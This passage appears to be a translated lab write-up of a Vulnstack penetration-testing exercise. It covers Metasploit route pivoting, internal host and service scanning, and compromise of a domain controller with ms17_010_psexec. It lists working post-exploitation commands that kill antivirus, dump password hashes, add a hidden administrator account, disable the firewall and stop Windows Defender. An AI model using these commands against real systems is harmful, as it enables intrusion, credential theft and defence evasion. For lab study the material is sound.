run get_local_subnets      # show the local subnets
# add or remove routes for a given session from the global msf console
route add 192.168.52.0  255.255.255.0  1     # route to 192.168.52.0/24 through session 1
route add 192.168.72.0  255.255.255.0  1     # route to 192.168.72.0/24 through session 1
route add 0.0.0.0       0.0.0.0        1     # default route (0.0.0.0/0) through session 1
route del 192.168.52.0  255.255.255.0  2     # remove the 192.168.52.0/24 route through session 2
route print    # print the routing table

# routes can also be added from inside the session
run autoroute -s 192.168.52.0/24             # route to 192.168.52.0/24
run autoroute -s 192.168.72.0/24             # route to 192.168.72.0/24
run autoroute -s 0.0.0.0/0                   # default route
run autoroute -p                             # print the routing table

Post-exploitation modules

run post/windows/manage/migrate           # automatic process migration
run post/windows/gather/checkvm           # check whether the target runs in a VM
run post/windows/manage/killav            # stop antivirus software
run post/windows/manage/enable_rdp        # enable Remote Desktop
run post/windows/manage/autoroute         # show routing information
run post/windows/gather/enum_logged_on_users    # list logged-on users
run post/windows/gather/enum_applications       # list installed applications
run post/windows/gather/credentials/windows_autologin # grab the auto-logon user name and password
run post/windows/gather/smart_hashdump               # dump all user hashes
run getgui -u hack -p 123
Sometimes the post module cannot add a user;
a user can be added from the shell instead:
net user hack Zyx960706 /add
net localgroup administrators hack /add
netsh advfirewall set allprofiles state off        # turn off the firewall
net stop windefend

Discovering live hosts in the domain (OS, ports)

auxiliary/scanner/discovery/udp_sweep    # find live internal hosts via UDP
auxiliary/scanner/discovery/udp_probe    # find live internal hosts via UDP
auxiliary/scanner/netbios/nbname         # find live internal hosts via NetBIOS
auxiliary/scanner/portscan/tcp           # TCP port scan (1-10000); an open port means the host is alive


Hosts .138, .141 and .143 have been found.

Port scanning

auxiliary/scanner/portscan/tcp           # TCP port scan (1-10000)
auxiliary/scanner/portscan/ack           # TCP ACK scan, ports 1-10000 by default
Port scanning sometimes drops the session, so it can be easier to upload nmap and scan from the shell. Remember to clean it up afterwards.

Service scanning

auxiliary/scanner/ftp/ftp_version        # FTP, default port 21
auxiliary/scanner/ssh/ssh_version        # SSH, default port 22
auxiliary/scanner/telnet/telnet_version  # Telnet, default port 23
auxiliary/scanner/dns/dns_amp            # DNS, default port 53
auxiliary/scanner/http/http_version      # HTTP, default port 80
auxiliary/scanner/http/title             # HTTP page titles
auxiliary/scanner/smb/smb_version        # SMB, default port 445
auxiliary/scanner/mssql/mssql_schemadump # SQL Server, default port 1433
auxiliary/scanner/oracle/oracle_hashdump # Oracle, default port 1521
auxiliary/scanner/mysql/mysql_version    # MySQL, default port 3306
auxiliary/scanner/rdp/rdp_scanner        # RDP, default port 3389
auxiliary/scanner/redis/redis_server     # Redis, default port 6379
auxiliary/scanner/db2/db2_version        # DB2, default port 50000
auxiliary/scanner/netbios/nbname         # NetBIOS names of internal hosts
Scan results:

C:\Nmap>nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138
nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138

Starting Nmap 7.00 ( https://nmap.org ) at 2020-06-02 09:45 中国标准时间
Nmap scan report for 192.168.52.138
Host is up (0.0027s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp    open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
88/tcp    open  tcpwrapped
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows 98 netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds (primary domain: GOD)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf       .NET Message Framing
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port445-TCP:V=7.00%I=7%D=6/2%Time=5ED5AFB0%P=i686-pc-windows-windows%r(
SF:SMBProgNeg,61,"\0\0\0\]\xffSMBr\0\0\0\0\x88\x01@\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0@\x06\0\0\x01\0\x11\x07\0\x0f2\0\x01\0\x04A\0\0\0\0\x01\0\0\0\0\0\
SF:xfc\xf3\x01\0J{\xd5\xc2\x7f8\xd6\x01\x20\xfe\x08\x18\0\x88\xed\xe6R\x94
SF:\xff\xdd\xffG\0O\0D\0\0\0O\0W\0A\0\0\0");
MAC Address: 00:0C:29:5C:30:26 (VMware)
Service Info: Host: OWA; OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98

Host script results:
|_nbstat: NetBIOS name: OWA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:5c:30:26 (VMware)
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: owa
|   NetBIOS computer name: OWA
|   Domain name: god.org
|   Forest name: god.org
|   FQDN: owa.god.org
|_  System time: 2020-06-02T09:48:12+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.61 seconds

Exploitation

use exploit/windows/smb/ms17_010_psexec


The DC has been taken. This lab is simple and suits beginners who have finished DVWA and pikachu and don't want to

Tags: Vulnstack